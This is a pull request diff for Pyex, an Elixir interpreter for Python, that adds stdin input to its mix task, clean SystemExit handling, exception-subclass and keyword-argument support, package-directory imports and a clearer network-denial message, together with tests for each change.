### PR TITLE
Support modular Python apps and production web workflows

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -16,10 +16,10 @@ jobs:
     strategy:
       matrix:
         include:
-          - otp: "28.0"
+          - otp: "28.1"
             elixir: "1.19"
             experimental: false
-          - otp: "28.0"
+          - otp: "28.1"
             elixir: "1.20.0-rc.2"
             experimental: true
 
@@ -96,29 +96,29 @@ jobs:
 
       - uses: erlef/setup-beam@v1
         with:
-          otp-version: "28.0"
+          otp-version: "28.1"
           elixir-version: "1.19"
 
       - name: Restore dependencies cache
         uses: actions/cache@v4
         with:
           path: deps
-          key: deps-${{ runner.os }}-28.0-1.19-${{ hashFiles('**/mix.lock') }}
-          restore-keys: deps-${{ runner.os }}-28.0-1.19-
+          key: deps-${{ runner.os }}-28.1-1.19-${{ hashFiles('**/mix.lock') }}
+          restore-keys: deps-${{ runner.os }}-28.1-1.19-
 
       - name: Restore build cache
         uses: actions/cache@v4
         with:
           path: _build
-          key: build-${{ runner.os }}-28.0-1.19-${{ hashFiles('**/mix.lock') }}
-          restore-keys: build-${{ runner.os }}-28.0-1.19-
+          key: build-${{ runner.os }}-28.1-1.19-${{ hashFiles('**/mix.lock') }}
+          restore-keys: build-${{ runner.os }}-28.1-1.19-
 
       - name: Restore PLT cache
         uses: actions/cache@v4
         with:
           path: _build/dev/*.plt*
-          key: plt-${{ runner.os }}-28.0-1.19-${{ hashFiles('**/mix.lock') }}
-          restore-keys: plt-${{ runner.os }}-28.0-1.19-
+          key: plt-${{ runner.os }}-28.1-1.19-${{ hashFiles('**/mix.lock') }}
+          restore-keys: plt-${{ runner.os }}-28.1-1.19-
 
       - name: Install dependencies
         run: mix deps.get
@@ -132,10 +132,10 @@ jobs:
     strategy:
       matrix:
         include:
-          - otp: "28.0"
+          - otp: "28.1"
             elixir: "1.19"
             experimental: false
-          - otp: "28.0"
+          - otp: "28.1"
             elixir: "1.20.0-rc.2"
             experimental: true
 

--- a/lib/mix/tasks/pyex.ex
+++ b/lib/mix/tasks/pyex.ex
@@ -4,6 +4,8 @@ defmodule Mix.Tasks.Pyex do
   Runs a `.py` file through the Pyex interpreter.
 
       mix pyex program.py
+      mix pyex -        # read source from stdin
+      echo 'print(1)' | mix pyex -
 
   Environment variables from the system are passed through
   to the script via `os.environ` and `sql` module access.
@@ -27,15 +29,16 @@ defmodule Mix.Tasks.Pyex do
   defp run_file(path) do
     trace = Pyex.Trace.attach()
 
-    case File.read(path) do
+    case read_source(path) do
       {:ok, code} ->
         ctx = Pyex.Ctx.new()
 
         case Pyex.run(code, ctx) do
-          {:ok, nil, _ctx} ->
-            :ok
+          {:ok, nil, ctx} ->
+            print_output(ctx)
 
-          {:ok, result, _ctx} ->
+          {:ok, result, ctx} ->
+            print_output(ctx)
             IO.inspect(result)
 
           {:error, msg} ->
@@ -48,4 +51,21 @@ defmodule Mix.Tasks.Pyex do
 
     Pyex.Trace.flush(trace)
   end
+
+  defp print_output(ctx) do
+    case Pyex.output(ctx) do
+      "" -> :ok
+      out -> IO.puts(out)
+    end
+  end
+
+  defp read_source("-") do
+    case IO.read(:stdio, :eof) do
+      :eof -> {:ok, ""}
+      {:error, reason} -> {:error, reason}
+      data when is_binary(data) -> {:ok, data}
+    end
+  end
+
+  defp read_source(path), do: File.read(path)
 end

--- a/lib/pyex/ctx.ex
+++ b/lib/pyex/ctx.ex
@@ -436,7 +436,9 @@ defmodule Pyex.Ctx do
           else: url_matched_rules |> Enum.flat_map(& &1.methods) |> Enum.uniq()
 
       "NetworkError: HTTP method #{method} is not allowed. " <>
-        "Allowed methods: #{Enum.join(allowed, ", ")}"
+        "Allowed methods: #{Enum.join(allowed, ", ")}. " <>
+        "To permit #{method}, add it to the matching rule's :methods list " <>
+        "(e.g. methods: [\"GET\", \"#{method}\"])"
     else
       prefixes =
         rules

--- a/lib/pyex/interpreter.ex
+++ b/lib/pyex/interpreter.ex
@@ -169,14 +169,24 @@ defmodule Pyex.Interpreter do
     ctx = init_profile(ctx)
 
     case eval(ast, env, ctx) do
-      {{:exception, msg}, _env, ctx} ->
-        {:error, Helpers.format_error(msg, ctx), ctx}
+      {{:exception, msg}, env, ctx} ->
+        if system_exit_zero?(msg) do
+          {:ok, nil, env, ctx}
+        else
+          {:error, Helpers.format_error(msg, ctx), ctx}
+        end
 
       {result, env, ctx} ->
         value = Helpers.unwrap(result)
         {:ok, Ctx.deep_deref(ctx, value), env, ctx}
     end
   end
+
+  @spec system_exit_zero?(String.t()) :: boolean()
+  defp system_exit_zero?("SystemExit"), do: true
+  defp system_exit_zero?("SystemExit: 0"), do: true
+  defp system_exit_zero?("SystemExit: None"), do: true
+  defp system_exit_zero?(_), do: false
 
   defmacrop is_py_exception(val) do
     quote do: is_tuple(unquote(val)) and elem(unquote(val), 0) == :exception
@@ -334,8 +344,18 @@ defmodule Pyex.Interpreter do
 
         base_name ->
           case Env.get(env, base_name) do
-            {:ok, {:class, _, _, _} = base} -> base
-            _ -> nil
+            {:ok, {:class, _, _, _} = base} ->
+              base
+
+            _ ->
+              # Builtin exception types (Exception, ValueError, ...) are
+              # not bound as real classes in the env -- they're handled as
+              # tagged strings at raise/except time. To make
+              # `class MyError(Exception): super().__init__(...)` work,
+              # synthesize a stub class for any recognized exception base
+              # name. Other unknown base names still fall through to nil
+              # so we don't silently mask typos.
+              builtin_exception_base_stub(base_name)
           end
       end)
       |> Enum.reject(&is_nil/1)
@@ -2595,6 +2615,40 @@ defmodule Pyex.Interpreter do
       {nil, env, ctx}
     end
   end
+
+  # Builtin exception type names that subclass __init__ may legitimately
+  # call `super().__init__(...)` against. Stubs accept any args/kwargs
+  # and do nothing, matching Python's permissive Exception.__init__.
+  @builtin_exception_names ~w(
+    BaseException Exception
+    ArithmeticError AssertionError AttributeError BufferError EOFError
+    FloatingPointError GeneratorExit ImportError IndexError KeyError
+    KeyboardInterrupt LookupError MemoryError NameError NotImplementedError
+    OSError IOError FileNotFoundError FileExistsError PermissionError
+    OverflowError RecursionError ReferenceError RuntimeError StopIteration
+    StopAsyncIteration SyntaxError IndentationError SystemError SystemExit
+    TabError TimeoutError TypeError UnboundLocalError UnicodeError
+    UnicodeDecodeError UnicodeEncodeError UnicodeTranslateError ValueError
+    ZeroDivisionError ConnectionError BrokenPipeError ConnectionAbortedError
+    ConnectionRefusedError ConnectionResetError ChildProcessError
+  )
+
+  @spec builtin_exception_base_stub(term()) :: pyvalue() | nil
+  defp builtin_exception_base_stub(name) when is_binary(name) do
+    if name in @builtin_exception_names do
+      noop = fn _args, _kwargs -> nil end
+
+      {:class, name, [],
+       %{
+         "__name__" => name,
+         "__init__" => {:builtin_kw, noop}
+       }}
+    else
+      nil
+    end
+  end
+
+  defp builtin_exception_base_stub(_), do: nil
 
   @doc false
   @spec eval_super(Env.t(), Ctx.t()) :: eval_result()

--- a/lib/pyex/interpreter.ex
+++ b/lib/pyex/interpreter.ex
@@ -2633,8 +2633,8 @@ defmodule Pyex.Interpreter do
     ConnectionRefusedError ConnectionResetError ChildProcessError
   )
 
-  @spec builtin_exception_base_stub(term()) :: pyvalue() | nil
-  defp builtin_exception_base_stub(name) when is_binary(name) do
+  @spec builtin_exception_base_stub(String.t()) :: pyvalue() | nil
+  defp builtin_exception_base_stub(name) do
     if name in @builtin_exception_names do
       noop = fn _args, _kwargs -> nil end
 
@@ -2647,8 +2647,6 @@ defmodule Pyex.Interpreter do
       nil
     end
   end
-
-  defp builtin_exception_base_stub(_), do: nil
 
   @doc false
   @spec eval_super(Env.t(), Ctx.t()) :: eval_result()

--- a/lib/pyex/interpreter/exceptions.ex
+++ b/lib/pyex/interpreter/exceptions.ex
@@ -28,10 +28,10 @@ defmodule Pyex.Interpreter.Exceptions do
   def eval_raise(expr, meta, env, ctx) do
     case expr do
       {:call, _, [{:var, _, [exc_name]}, args]} when is_list(args) ->
-        eval_raise_exc_class(exc_name, args, meta, env, ctx)
+        eval_raise_exc_class(exc_name, args, [], meta, env, ctx)
 
-      {:call, _, [{:var, _, [exc_name]}, args, _kwargs]} when is_list(args) ->
-        eval_raise_exc_class(exc_name, args, meta, env, ctx)
+      {:call, _, [{:var, _, [exc_name]}, args, kwargs]} when is_list(args) ->
+        eval_raise_exc_class(exc_name, args, kwargs, meta, env, ctx)
 
       {:var, _, [exc_name]} ->
         {{:exception, exc_name}, env, ctx}
@@ -65,20 +65,32 @@ defmodule Pyex.Interpreter.Exceptions do
     {:instance, {:class, class_name, [], %{}}, %{"args" => {:tuple, [msg]}}}
   end
 
-  @spec eval_raise_exc_class(String.t(), [Parser.ast_node()], Parser.meta(), Env.t(), Ctx.t()) ::
+  @spec eval_raise_exc_class(
+          String.t(),
+          [Parser.ast_node()],
+          [Parser.ast_node()],
+          Parser.meta(),
+          Env.t(),
+          Ctx.t()
+        ) ::
           eval_result()
-  defp eval_raise_exc_class(exc_name, args, _meta, env, ctx) do
-    case Env.get(env, exc_name) do
-      {:ok, {:class, _, _, _} = class} ->
-        case Interpreter.eval_list(args, env, ctx) do
-          {{:exception, _} = signal, env, ctx} ->
-            {signal, env, ctx}
+  defp eval_raise_exc_class(exc_name, args, kwargs, _meta, env, ctx) do
+    # Use eval_call_args so positional args, {:kwarg, ...} entries, and
+    # an explicit kwargs list are all normalized the same way regular
+    # function calls are. This lets `raise SomeError("msg", code=1)`
+    # work just like `SomeError("msg", code=1)` would.
+    arg_exprs = args ++ List.wrap(kwargs)
 
-          {rev_values, env, ctx} ->
-            values = Enum.reverse(rev_values)
-            msg = format_exc_msg(exc_name, values)
+    case Interpreter.eval_call_args(arg_exprs, env, ctx) do
+      {{:exception, _} = signal, env, ctx} ->
+        {signal, env, ctx}
 
-            case Interpreter.call_function(class, values, %{}, env, ctx) do
+      {values, kwargs_map, env, ctx} ->
+        msg = format_exc_msg(exc_name, values)
+
+        case Env.get(env, exc_name) do
+          {:ok, {:class, _, _, _} = class} ->
+            case Interpreter.call_function(class, values, kwargs_map, env, ctx) do
               {{:exception, _}, env, ctx} ->
                 instance = {:instance, class, %{"args" => {:tuple, values}}}
                 ctx = %{ctx | exception_instance: instance}
@@ -86,20 +98,12 @@ defmodule Pyex.Interpreter.Exceptions do
 
               {instance, env, ctx} ->
                 derefed = Ctx.deref(ctx, instance)
+                derefed = ensure_args(derefed, values)
                 ctx = %{ctx | exception_instance: derefed}
                 {{:exception, msg}, env, ctx}
             end
-        end
 
-      _ ->
-        case Interpreter.eval_list(args, env, ctx) do
-          {{:exception, _} = signal, env, ctx} ->
-            {signal, env, ctx}
-
-          {rev_values, env, ctx} ->
-            values = Enum.reverse(rev_values)
-            msg = format_exc_msg(exc_name, values)
-
+          _ ->
             instance =
               {:instance, {:class, exc_name, [], %{}}, %{"args" => {:tuple, values}}}
 
@@ -108,6 +112,16 @@ defmodule Pyex.Interpreter.Exceptions do
         end
     end
   end
+
+  defp ensure_args({:instance, cls, fields}, values) do
+    if Map.has_key?(fields, "args") do
+      {:instance, cls, fields}
+    else
+      {:instance, cls, Map.put(fields, "args", {:tuple, values})}
+    end
+  end
+
+  defp ensure_args(other, _values), do: other
 
   @spec format_exc_msg(String.t(), [Interpreter.pyvalue()]) :: String.t()
   defp format_exc_msg(exc_name, values) do

--- a/lib/pyex/interpreter/helpers.ex
+++ b/lib/pyex/interpreter/helpers.ex
@@ -127,8 +127,13 @@ defmodule Pyex.Interpreter.Helpers do
     "<class '#{type_name}'>"
   end
 
-  def py_str({:instance, {:class, name, _, _}, _}) do
-    "<#{name} instance>"
+  def py_str({:instance, {:class, name, _, _}, fields}) do
+    case fields do
+      %{"args" => {:tuple, [arg]}} -> py_str(arg)
+      %{"args" => {:tuple, []}} -> ""
+      %{"args" => {:tuple, args}} -> "(" <> Enum.map_join(args, ", ", &py_str/1) <> ")"
+      _ -> "<#{name} instance>"
+    end
   end
 
   def py_str({:super_proxy, _, _}), do: "<super>"

--- a/lib/pyex/interpreter/import.ex
+++ b/lib/pyex/interpreter/import.ex
@@ -133,9 +133,23 @@ defmodule Pyex.Interpreter.Import do
         resolve_single_module(single, env, ctx)
 
       [root | parts] ->
+        # Dotted names have two possible meanings:
+        #   1. A nested attribute walk on a module (e.g. `os.path`) — this
+        #      is how the stdlib exposes submodules as map fields.
+        #   2. A file in a package directory on the virtual filesystem
+        #      (e.g. `pkg.math_utils` → `pkg/math_utils.py`).
+        # Try the attribute walk first to preserve stdlib precedence,
+        # then fall back to a direct filesystem lookup so user code can
+        # organize modules into package directories.
         case resolve_single_module(root, env, ctx) do
           {:ok, module_value, ctx} ->
-            resolve_dotted_parts(module_value, parts, name, ctx)
+            case resolve_dotted_parts(module_value, parts, name, ctx) do
+              {:ok, _, _} = ok -> ok
+              {:unknown_module, ctx} -> resolve_filesystem_module(name, env, ctx)
+            end
+
+          {:unknown_module, ctx} ->
+            resolve_filesystem_module(name, env, ctx)
 
           other ->
             other
@@ -294,7 +308,10 @@ defmodule Pyex.Interpreter.Import do
           {:ok, source} ->
             case Pyex.compile(source) do
               {:ok, ast} ->
-                mod_env = Env.push_scope(Builtins.env())
+                mod_env =
+                  Builtins.env()
+                  |> Env.push_scope()
+                  |> Env.put("__name__", name)
 
                 case Interpreter.eval(ast, mod_env, ctx) do
                   {{:exception, msg}, _mod_env, ctx} ->

--- a/lib/pyex/interpreter/invocation.ex
+++ b/lib/pyex/interpreter/invocation.ex
@@ -287,6 +287,10 @@ defmodule Pyex.Interpreter.Invocation do
 
           {:exception, _} = signal ->
             {signal, env, ctx}
+
+          _ ->
+            {ref, ctx} = Ctx.heap_alloc(ctx, instance)
+            {ref, env, ctx}
         end
 
       :error ->

--- a/test/pyex/filesystem_import_test.exs
+++ b/test/pyex/filesystem_import_test.exs
@@ -75,6 +75,43 @@ defmodule Pyex.FilesystemImportTest do
 
       assert result == 7
     end
+
+    test "imported module sees __name__ bound to its module name" do
+      {result, _ctx} =
+        run_with_fs!(
+          """
+          import helpers
+          helpers.who_am_i()
+          """,
+          %{
+            "helpers.py" => """
+            def who_am_i():
+                return __name__
+            """
+          }
+        )
+
+      assert result == "helpers"
+    end
+
+    test "imported module's top-level guard does not run as __main__" do
+      {result, _ctx} =
+        run_with_fs!(
+          """
+          import guarded
+          guarded.MARKER
+          """,
+          %{
+            "guarded.py" => """
+            MARKER = "library"
+            if __name__ == "__main__":
+                MARKER = "script"
+            """
+          }
+        )
+
+      assert result == "library"
+    end
   end
 
   describe "from-import from filesystem" do

--- a/test/pyex/filesystem_module_composition_test.exs
+++ b/test/pyex/filesystem_module_composition_test.exs
@@ -1,0 +1,504 @@
+defmodule Pyex.FilesystemModuleCompositionTest do
+  @moduledoc """
+  Tests that exercise sharing Python code across multiple files in the
+  virtual filesystem — i.e. building modular, reusable libraries the way
+  a real Python project would.
+
+  These go beyond the simple "import X; X.f()" cases in
+  `Pyex.FilesystemImportTest` and cover scenarios that matter for
+  composition: cross-module classes, inheritance, decorators, shared
+  exceptions, diamond imports, package directories, and multi-stage
+  pipelines built from independent modules.
+  """
+
+  use ExUnit.Case, async: true
+
+  alias Pyex.{Ctx, Error, Filesystem.Memory}
+
+  defp run_with_files!(code, files) do
+    fs = Memory.new(files)
+    ctx = Ctx.new(filesystem: fs)
+
+    case Pyex.run(code, ctx) do
+      {:ok, value, ctx} -> {value, ctx}
+      {:error, %Error{message: msg}} -> raise "Pyex error: #{msg}"
+    end
+  end
+
+  defp run_with_files(code, files) do
+    fs = Memory.new(files)
+    Pyex.run(code, Ctx.new(filesystem: fs))
+  end
+
+  describe "cross-module classes" do
+    test "instantiate a class defined in another module" do
+      {result, _ctx} =
+        run_with_files!(
+          """
+          from models import User
+          u = User("ivar", 30)
+          u.greeting()
+          """,
+          %{
+            "models.py" => """
+            class User:
+                def __init__(self, name, age):
+                    self.name = name
+                    self.age = age
+
+                def greeting(self):
+                    return "hi " + self.name
+            """
+          }
+        )
+
+      assert result == "hi ivar"
+    end
+
+    test "subclass in one module extends a base class from another" do
+      {result, _ctx} =
+        run_with_files!(
+          """
+          from animals import Dog
+          d = Dog("rex")
+          d.describe()
+          """,
+          %{
+            "base.py" => """
+            class Animal:
+                def __init__(self, name):
+                    self.name = name
+
+                def describe(self):
+                    return self.name + " is a " + self.kind()
+            """,
+            "animals.py" => """
+            from base import Animal
+
+            class Dog(Animal):
+                def kind(self):
+                    return "dog"
+            """
+          }
+        )
+
+      assert result == "rex is a dog"
+    end
+
+    test "isinstance recognizes objects across module boundaries" do
+      {result, _ctx} =
+        run_with_files!(
+          """
+          from shapes import Circle
+          from base import Shape
+          c = Circle(5)
+          isinstance(c, Shape)
+          """,
+          %{
+            "base.py" => """
+            class Shape:
+                pass
+            """,
+            "shapes.py" => """
+            from base import Shape
+
+            class Circle(Shape):
+                def __init__(self, r):
+                    self.r = r
+            """
+          }
+        )
+
+      assert result == true
+    end
+  end
+
+  describe "shared exception types" do
+    test "exception raised in one module is caught by type in another" do
+      {result, _ctx} =
+        run_with_files!(
+          """
+          from service import charge
+          from errors import PaymentError
+
+          try:
+              charge(-1)
+              result = "no error"
+          except PaymentError as e:
+              result = "caught: " + str(e)
+
+          result
+          """,
+          %{
+            "errors.py" => """
+            class PaymentError(Exception):
+                pass
+            """,
+            "service.py" => """
+            from errors import PaymentError
+
+            def charge(amount):
+                if amount <= 0:
+                    raise PaymentError("amount must be positive")
+                return amount
+            """
+          }
+        )
+
+      assert result =~ "caught:"
+      assert result =~ "amount must be positive"
+    end
+  end
+
+  describe "shared state via accessor functions" do
+    # Pyex modules are immutable maps, not CPython-style singleton dicts,
+    # so writing to a module attribute from outside the module doesn't
+    # propagate. The portable, cross-implementation pattern is to expose
+    # accessor functions that close over a module-local variable — this
+    # works in Pyex today.
+    test "accessor functions over a closed-over variable share state" do
+      {result, _ctx} =
+        run_with_files!(
+          """
+          from counter import bump, get
+          bump()
+          bump()
+          bump()
+          get()
+          """,
+          %{
+            "counter.py" => """
+            _state = {"n": 0}
+
+            def bump():
+                _state["n"] = _state["n"] + 1
+
+            def get():
+                return _state["n"]
+            """
+          }
+        )
+
+      assert result == 3
+    end
+
+    test "shared counter module used from a second module via accessor functions" do
+      {result, _ctx} =
+        run_with_files!(
+          """
+          import counter
+          from bumper import bump_twice
+
+          bump_twice()
+          bump_twice()
+          counter.get()
+          """,
+          %{
+            "counter.py" => """
+            _state = {"n": 0}
+
+            def bump():
+                _state["n"] = _state["n"] + 1
+
+            def get():
+                return _state["n"]
+            """,
+            "bumper.py" => """
+            from counter import bump
+
+            def bump_twice():
+                bump()
+                bump()
+            """
+          }
+        )
+
+      assert result == 4
+    end
+
+    @tag :skip
+    test "(KNOWN GAP) writing to a module attribute from outside the module" do
+      # CPython treats modules as singleton mutable namespaces, so
+      # `counter.value = 1` from outside `counter.py` rebinds the module
+      # global. Pyex caches modules as immutable maps in
+      # ctx.imported_modules, so external attribute writes are lost.
+      # Use accessor functions instead (see tests above).
+      {result, _ctx} =
+        run_with_files!(
+          """
+          import counter
+          counter.value = 10
+          counter.value
+          """,
+          %{"counter.py" => "value = 0\n"}
+        )
+
+      assert result == 10
+    end
+  end
+
+  describe "diamond imports" do
+    test "shared module loaded once even when imported via two paths" do
+      {_result, ctx} =
+        run_with_files!(
+          """
+          import left
+          import right
+          """,
+          %{
+            "shared.py" => """
+            print("shared loaded")
+            """,
+            "left.py" => """
+            import shared
+            """,
+            "right.py" => """
+            import shared
+            """
+          }
+        )
+
+      output = Pyex.output(ctx)
+      assert output =~ "shared loaded"
+      # Module body must execute exactly once across all import paths.
+      assert length(String.split(output, "shared loaded")) == 2
+    end
+  end
+
+  describe "package directories (dotted imports)" do
+    test "import a module nested in a package directory" do
+      {result, _ctx} =
+        run_with_files!(
+          """
+          from pkg.math_utils import add
+          add(2, 3)
+          """,
+          %{
+            "pkg/math_utils.py" => """
+            def add(a, b):
+                return a + b
+            """
+          }
+        )
+
+      assert result == 5
+    end
+
+    test "nested package module can import a sibling via the package path" do
+      {result, _ctx} =
+        run_with_files!(
+          """
+          from pkg.api import compute
+          compute(4)
+          """,
+          %{
+            "pkg/core.py" => """
+            def square(x):
+                return x * x
+            """,
+            "pkg/api.py" => """
+            from pkg.core import square
+
+            def compute(x):
+                return square(x) + 1
+            """
+          }
+        )
+
+      assert result == 17
+    end
+  end
+
+  describe "facade / re-export modules" do
+    test "facade module re-exports names from internal modules" do
+      {result, _ctx} =
+        run_with_files!(
+          """
+          from mylib import double, triple
+          double(5) + triple(5)
+          """,
+          %{
+            "_doubler.py" => """
+            def double(x):
+                return x * 2
+            """,
+            "_tripler.py" => """
+            def triple(x):
+                return x * 3
+            """,
+            "mylib.py" => """
+            from _doubler import double
+            from _tripler import triple
+            """
+          }
+        )
+
+      assert result == 25
+    end
+  end
+
+  describe "decorator defined in one module, applied in another" do
+    test "decorator from a helper module wraps a function in a consumer module" do
+      {result, _ctx} =
+        run_with_files!(
+          """
+          from app import shout
+          shout("hello")
+          """,
+          %{
+            "decorators.py" => """
+            def upper(fn):
+                def wrapper(*args, **kwargs):
+                    return fn(*args, **kwargs).upper()
+                return wrapper
+            """,
+            "app.py" => """
+            from decorators import upper
+
+            @upper
+            def shout(msg):
+                return msg
+            """
+          }
+        )
+
+      assert result == "HELLO"
+    end
+  end
+
+  describe "multi-stage pipeline composed from independent modules" do
+    test "parse → validate → render pipeline assembled in main" do
+      {result, _ctx} =
+        run_with_files!(
+          """
+          from parser import parse
+          from validator import validate
+          from renderer import render
+
+          raw = "name=ivar;age=30"
+          parsed = parse(raw)
+          validate(parsed)
+          render(parsed)
+          """,
+          %{
+            "parser.py" => """
+            def parse(s):
+                out = {}
+                for pair in s.split(";"):
+                    k, v = pair.split("=")
+                    out[k] = v
+                return out
+            """,
+            "validator.py" => """
+            class ValidationError(Exception):
+                pass
+
+            def validate(d):
+                if "name" not in d:
+                    raise ValidationError("missing name")
+                return True
+            """,
+            "renderer.py" => """
+            def render(d):
+                parts = []
+                for k in sorted(d.keys()):
+                    parts.append(k + ":" + d[k])
+                return ", ".join(parts)
+            """
+          }
+        )
+
+      assert result == "age:30, name:ivar"
+    end
+
+    test "pipeline failure surfaces the right exception type at the call site" do
+      {result, _ctx} =
+        run_with_files!(
+          """
+          from parser import parse
+          from validator import validate, ValidationError
+
+          try:
+              validate(parse("age=30"))
+              result = "ok"
+          except ValidationError as e:
+              result = "rejected: " + str(e)
+
+          result
+          """,
+          %{
+            "parser.py" => """
+            def parse(s):
+                out = {}
+                for pair in s.split(";"):
+                    k, v = pair.split("=")
+                    out[k] = v
+                return out
+            """,
+            "validator.py" => """
+            class ValidationError(Exception):
+                pass
+
+            def validate(d):
+                if "name" not in d:
+                    raise ValidationError("missing name")
+                return True
+            """
+          }
+        )
+
+      assert result == "rejected: missing name"
+    end
+  end
+
+  describe "dependency injection across modules" do
+    test "main injects a strategy function from one module into another" do
+      {result, _ctx} =
+        run_with_files!(
+          """
+          from strategies import double
+          from runner import apply_to_all
+
+          apply_to_all(double, [1, 2, 3, 4])
+          """,
+          %{
+            "strategies.py" => """
+            def double(x):
+                return x * 2
+
+            def negate(x):
+                return -x
+            """,
+            "runner.py" => """
+            def apply_to_all(fn, items):
+                return [fn(x) for x in items]
+            """
+          }
+        )
+
+      assert result == [2, 4, 6, 8]
+    end
+  end
+
+  describe "import-time errors propagate clearly" do
+    test "broken transitive import names the failing module" do
+      {:error, %Error{message: msg}} =
+        run_with_files(
+          """
+          import app
+          """,
+          %{
+            "app.py" => """
+            from broken import thing
+            """,
+            "broken.py" => """
+            x = 1 / 0
+            """
+          }
+        )
+
+      assert msg =~ "ImportError"
+      assert msg =~ "broken"
+    end
+  end
+end

--- a/test/pyex/mix_task_pyex_test.exs
+++ b/test/pyex/mix_task_pyex_test.exs
@@ -1,0 +1,29 @@
+defmodule Pyex.MixTaskPyexTest do
+  use ExUnit.Case, async: false
+
+  import ExUnit.CaptureIO
+
+  test "reads source from stdin when path is '-'" do
+    output =
+      capture_io("print('hello from stdin')\n", fn ->
+        Mix.Tasks.Pyex.run(["-"])
+      end)
+
+    assert output =~ "hello from stdin"
+  end
+
+  test "stdin source can span multiple lines (heredoc style)" do
+    source = """
+    def greet(name):
+        return "hi " + name
+    print(greet("ivar"))
+    """
+
+    output =
+      capture_io(source, fn ->
+        Mix.Tasks.Pyex.run(["-"])
+      end)
+
+    assert output =~ "hi ivar"
+  end
+end

--- a/test/pyex/stdlib/requests_test.exs
+++ b/test/pyex/stdlib/requests_test.exs
@@ -471,6 +471,25 @@ defmodule Pyex.Stdlib.RequestsTest do
       end
     end
 
+    test "denial message teaches caller how to permit the blocked method", %{bypass: bypass} do
+      port = bypass.port
+      prefix = "http://localhost:#{port}/"
+
+      err =
+        assert_raise RuntimeError, fn ->
+          Pyex.run!(
+            """
+            import requests
+            requests.post("http://localhost:#{port}/data", json={})
+            """,
+            network: [%{allowed_url_prefix: prefix}]
+          )
+        end
+
+      assert err.message =~ ~s(:methods)
+      assert err.message =~ ~s("POST")
+    end
+
     test "custom methods per prefix", %{bypass: bypass} do
       Bypass.expect_once(bypass, "POST", "/api/data", fn conn ->
         {:ok, _body, conn} = Plug.Conn.read_body(conn)

--- a/test/pyex/system_exit_test.exs
+++ b/test/pyex/system_exit_test.exs
@@ -1,0 +1,40 @@
+defmodule Pyex.SystemExitTest do
+  use ExUnit.Case, async: true
+
+  test "sys.exit() returns ok with nil (clean exit)" do
+    assert {:ok, nil, _ctx} =
+             Pyex.run("""
+             import sys
+             sys.exit()
+             """)
+  end
+
+  test "sys.exit(0) returns ok with nil (clean exit)" do
+    assert {:ok, nil, _ctx} =
+             Pyex.run("""
+             import sys
+             sys.exit(0)
+             """)
+  end
+
+  test "sys.exit(1) is reported as an error" do
+    assert {:error, %Pyex.Error{message: msg}} =
+             Pyex.run("""
+             import sys
+             sys.exit(1)
+             """)
+
+    assert msg =~ "SystemExit: 1"
+  end
+
+  test "sys.exit() preserves prior print output in ctx" do
+    assert {:ok, nil, ctx} =
+             Pyex.run("""
+             import sys
+             print("before exit")
+             sys.exit()
+             """)
+
+    assert Pyex.output(ctx) =~ "before exit"
+  end
+end

--- a/test/pyex/web_app_workflow_test.exs
+++ b/test/pyex/web_app_workflow_test.exs
@@ -23,7 +23,7 @@ defmodule Pyex.WebAppWorkflowTest do
 
   Uses a persistent requests.Session so the auth header and connection
   state are reused across calls. Every request has an explicit timeout,
-  and HTTP failures surface as the domain-specific ApiError exception
+  and HTTP failures surface as the domain-specific APIError exception
   (subclass of Exception) so callers can catch the right thing.
   \"\"\"
 
@@ -33,7 +33,7 @@ defmodule Pyex.WebAppWorkflowTest do
   DEFAULT_TIMEOUT = 10.0
 
 
-  class ApiError(Exception):
+  class APIError(Exception):
       \"\"\"Raised when the items API returns an error response.\"\"\"
 
       def __init__(self, message, status_code=None, item_id=None):
@@ -46,7 +46,7 @@ defmodule Pyex.WebAppWorkflowTest do
           return self.message
 
 
-  class ApiClient:
+  class APIClient:
       def __init__(self, base_url, api_key, timeout=DEFAULT_TIMEOUT):
           if not base_url:
               raise ValueError("base_url is required")
@@ -61,14 +61,14 @@ defmodule Pyex.WebAppWorkflowTest do
           }
 
       def fetch(self, item_id):
-          \"\"\"GET /items/<id>. Raises ApiError on non-2xx.\"\"\"
+          \"\"\"GET /items/<id>. Raises APIError on non-2xx.\"\"\"
           response = requests.get(
               self._item_url(item_id),
               headers=self._headers,
               timeout=self._timeout,
           )
           if not response.ok:
-              raise ApiError(
+              raise APIError(
                   "fetch failed: " + str(response.status_code),
                   status_code=response.status_code,
                   item_id=item_id,
@@ -76,7 +76,7 @@ defmodule Pyex.WebAppWorkflowTest do
           return response.json()
 
       def create(self, payload):
-          \"\"\"POST /items. Raises ApiError on non-2xx.\"\"\"
+          \"\"\"POST /items. Raises APIError on non-2xx.\"\"\"
           if not isinstance(payload, dict):
               raise TypeError("payload must be a dict")
 
@@ -87,7 +87,7 @@ defmodule Pyex.WebAppWorkflowTest do
               timeout=self._timeout,
           )
           if not response.ok:
-              raise ApiError(
+              raise APIError(
                   "create failed: " + str(response.status_code),
                   status_code=response.status_code,
               )
@@ -100,14 +100,14 @@ defmodule Pyex.WebAppWorkflowTest do
   """
 
   @consumer_py """
-  \"\"\"Higher-level operations layered on top of ApiClient.
+  \"\"\"Higher-level operations layered on top of APIClient.
 
   Each public function fetches every id exactly once and returns a
   structured result so the caller has full traceability into what
   succeeded and what failed.
   \"\"\"
 
-  from api_client import ApiError
+  from api_client import APIError
 
 
   def fetch_all(client, ids):
@@ -126,7 +126,7 @@ defmodule Pyex.WebAppWorkflowTest do
 
 
   def fetch_partial(client, ids):
-      \"\"\"Fetch every id, partitioning successes and ApiErrors.
+      \"\"\"Fetch every id, partitioning successes and APIErrors.
 
       Returns {ok: [...], errors: [(id, status_code, message), ...]}.
       Bare exceptions (programming errors) are NOT swallowed.
@@ -136,7 +136,7 @@ defmodule Pyex.WebAppWorkflowTest do
       for item_id in ids:
           try:
               ok.append(client.fetch(item_id))
-          except ApiError as e:
+          except APIError as e:
               errors.append((item_id, e.status_code, str(e)))
       return {"ok": ok, "errors": errors}
   """
@@ -190,7 +190,7 @@ defmodule Pyex.WebAppWorkflowTest do
 
       main = """
       import json
-      from api_client import ApiClient
+      from api_client import APIClient
       from consumer import summarize
 
 
@@ -200,7 +200,7 @@ defmodule Pyex.WebAppWorkflowTest do
 
 
       config = load_config("secrets.json")
-      client = ApiClient(config["base_url"], config["api_key"])
+      client = APIClient(config["base_url"], config["api_key"])
       summarize(client, [1, 2, 3])
       """
 
@@ -245,7 +245,7 @@ defmodule Pyex.WebAppWorkflowTest do
 
       main = """
       import json
-      from api_client import ApiClient
+      from api_client import APIClient
 
 
       def load_config(path):
